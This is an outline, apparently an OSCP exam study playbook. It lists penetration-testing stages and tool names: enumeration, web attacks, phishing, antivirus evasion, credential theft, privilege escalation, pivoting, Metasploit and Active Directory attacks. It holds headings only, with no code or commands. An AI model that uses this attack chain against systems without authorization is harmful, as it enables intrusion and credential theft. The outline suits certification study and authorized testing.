2. OSCP PLAYBOOK
1. Host Enumeration
1.1. Passive Enumeration
- Whois
- Netcraft
- Whatweb
- Github Leakage
- gitrob
- gitleaks
- Security Headers
- securityheaders.com
- ssllabs.com/ssltest
- Shodan
1.2. Active Enumeration
- DNS Enumeration
- host
- dnsrecon
- dnsenum
- nslookup (WIN)
- Host Enumeration
- nmap
- Test-NetConnection (WIN)
- nc
- SMB Enumeration
- nbtscan
- smbmap
- net view (WIN)
- CrackMapExec
- SMTP Enumeration
- nc
- TelnetClient (WIN)
- SNMP Enumeration
- onesixtyone
- snmpwalk
2. Vulnerability Scanning
3. Web
3.1. Web Application Enumeration
- Banner Grabbing
- nmap
- nc
- Directory Busting
- gobuster
- dirb
- dirsearch
- Source-code & Requests
- burp
- curl
- Infrastructure
- Response-headers
- Sitemaps
- API Fuzzing
- Wordpress Enumeration
- wpscan
- dirsearch
- Netcraft
- Whatweb
3.2. Web Application Attacks
- Cross-site-scripting
- Stored XSS
- Reflected XSS
- DOM-based XSS
- Directory Traversal
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- PHP Wrappers
- File Upload
- OS Command Injection
- SQL Injection
- Error-based SQLi
- Union-based SQLi
- Blind SQLi
- sqlmap
- Wordpress Reverse Shell
4. Client-side
4.1. Target Reconnaissance
4.2. Client-side Attacks
- Macros
- Windows Library-ms
- Phishing
5. Exploits
- Exploit-DB/searchsploit
- Packet Storm
- GitHub
- Metasploit
- NSE Scripts
- Cross-compiling
6. Anti-virus Evasion
6.1. Evasion Testing
- AntiScan.Me
- VirusTotal
6.2. Evasion TTPs
7. Password Attacks
7.1. Remote Password Attacks
7.2. Hash-stealing
- Mimikatz
- Pass-the-hash
- NTLMv2 Stealing
- NTLMv2 Relaying
7.3. Hash-cracking
- Hash Enumeration
- Hash Conversion
- Hash Cracking
8. Windows Privilege Escalation
8.1. Enumeration
8.2. Privilege Escalation
- Named Pipes (whoami /priv)
- PrintSpoofer
- Dumping SAM
- Writable Files & Directories
- Service Binary Hijacking
- Unquoted Service Paths
- Scheduled Tasks
- DLL Hijacking
- UAC Bypass
- NTLMv2 Stealing
- NTLMv2 Relaying
9. Linux Privilege Escalation
9.1. Enumeration
9.2. Privilege Escalation
- Sudo -l
- SUID Binaries
- Capabilities
- Writable Files & Directories
- Cronjobs
- Exploits
- PwnKit
- Dirtypipes
- Samedit
10. Port Tunneling & Pivoting
10.1. Linux Pivoting
- Socat
- Proxychains (SOCKS)
- Ligolo-ng
- SSH Port Forwarding
10.2. Windows Pivoting
10.3. Other Tunnels
11. Metasploit Framework
- Setup
- Meterpreter
- MSFVenom
- Automated Resource Scripts
- Post Exploitation
12. Active Directory
12.1. Enumeration
12.2. Manipulation & Escalation
- Kerberoasting
- ASREP Roasting
- SPNs + Silver Tickets
- Object Permissions (GenericAll)
- Lsass
- Domain Shares
- DCSync
- DCOM
- NTLMv2 Stealing
- NTLMv2 Relaying